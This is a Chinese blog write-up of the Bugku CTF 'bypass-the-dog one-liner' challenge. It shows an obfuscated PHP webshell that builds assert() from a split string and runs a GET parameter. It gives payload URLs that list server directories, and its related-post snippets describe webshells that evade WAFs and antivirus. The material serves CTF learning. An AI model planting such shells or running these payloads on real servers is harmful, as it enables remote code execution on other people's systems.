CTF之Bugku 过狗的一句话

最新推荐文章于 2021-01-20 20:28:44 发布
最新推荐文章于 2021-01-20 20:28:44 发布
阅读量422 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41607190/article/details/101950020
版权

原理:
利用assert()函数的漏洞----如果参数中返回的是false,报错但继续执行

<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

上面是题目提示
explode()会把字符串打散成对应得数组,也就是$poc_2=assert

所以我们在url上提交s参数

http://123.206.87.240:8010/?s=print_r(scandir(’./’))
作用是扫描当前目录下的所有文件
还可以是
http://123.206.87.240:8010/?s=print_r(scandir(’. . /’))(没有空格)
作用是扫描上级目录的文件

一般是用第一个提交后页面就会跳转
比较骚的是我在做的时候并没有
不过学到东西就行了

InventorMAO
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-过狗一句话
臭nana的博客
11-28 901
提示代码 &lt;?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?&gt; 用assert执行任意函数 payload:?s=print_r(scandi...
送给大家一个过狗一句话
qq_48511129的博客
01-26 384
送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc); poc2=poc_2=poc2​=poc_1[0].poc1[1].poc_1[1].poc1​[1].poc_1[2].poc1[3].poc_1[3].poc1​[3].poc_1[4].$poc_1[5]; poc2(poc_2(poc2​(_GET[‘s’]) 分析代码构
BugkuCTF过狗一句话(web)
s0il的博客
04-19 2442
题目描述: 上面的php进行格式化之后: <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_...
Bugku-web(三)
weixin_44866139的博客
02-18 315
welcom to bugku 题目好像不能访问了,看看其他博主的博客吧 https://www.cnblogs.com/Pinging/p/8278168.html 过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_...
一句话过WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1841
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过狗马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
1-CTF解题技能之MISC基础 一
10-05
1-CTF解题技能之MISC基础 一
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
bugkuctf过狗一句话 writeup
lansefly1990的专栏
10-02 1240
过狗一句话 &lt;?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?&gt; 用assert执行任意代码  payload:http://120.24.86.145:...
发现自己一天居然没说过一句话
经营人生
08-19 898
周六.上午学习下午看电视(连播5集>,刚好从第一集看起,平常没时间看电视,这一看居然发现自己还挺喜欢看电视的~~)到这时候,发现自己居然还没说过一句话~~~ 
bugku 过狗一句话 writeup
xuchen16的博客
09-21 1856
参考:https://blog.csdn.net/qq_30464257/article/details/81160181                 PHP file_get_contents() 函数   例子 &lt;?php echo file_get_contents("test.txt"); ?&gt; 输出: This ...
bugku web 25-32 write up
h0ryit的博客
05-20 1023
XSS 打开页面,如图: 注意:这里以id为参数,一般这种题没提示参数的话就是ID,初次这种题的人可能回懵。 查看源码: &amp;amp;amp;amp;amp;amp;lt;!doctype html&amp;amp;amp;amp;amp;amp;gt; &amp;amp;amp;amp;amp;amp;lt;html lang=&amp;amp;amp;amp;amp;quot;en&amp;amp;amp;amp;amp;quot;
php 过狗一句话木马的编写
大方子
09-02 1万+
  我们都知道 这个是php一句话  &lt;?php assert($_POST['mima']); ?&gt;可是服务器的安全狗会识别到,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码)  这个函数会执行括号里的代码,(eval 的一句话木...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
BUGKU web22 assert注入漏洞
m0_49762339的博客
01-20 470
这道题和攻防世界那道/.git泄露差不多 题目给了提示: <?PHP $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc_1=assert $_GET=s 因此只需要构造payload=?s=XXX即可 这里先尝试payload=?s=phpinfo();存在回显 因
BugkuCTF 过狗一句话
3tu6b0rn的博客
05-14 525
点开链接没有任何内容,源代码也是 后台扫描也无果 回到提示 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> explode() ...
ctf一句话木马上传
最新发布
06-12
CTF(Capture The Flag)中的"一句话木马上传"通常是指在网络安全竞赛或渗透测试挑战中,一种常见的攻击手段,用于将恶意代码隐藏在看似正常的字符串中,然后通过HTTP或类似协议发送到服务器上执行。这句话木马通常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值